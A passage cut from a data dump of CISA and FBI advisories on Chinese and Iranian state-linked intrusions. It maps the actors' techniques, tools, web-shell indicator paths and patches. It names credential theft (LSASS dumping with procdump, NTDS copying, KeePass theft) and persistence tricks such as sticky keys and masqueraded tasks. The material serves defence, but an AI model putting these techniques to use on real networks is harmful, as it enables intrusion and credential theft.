scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/ >)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN 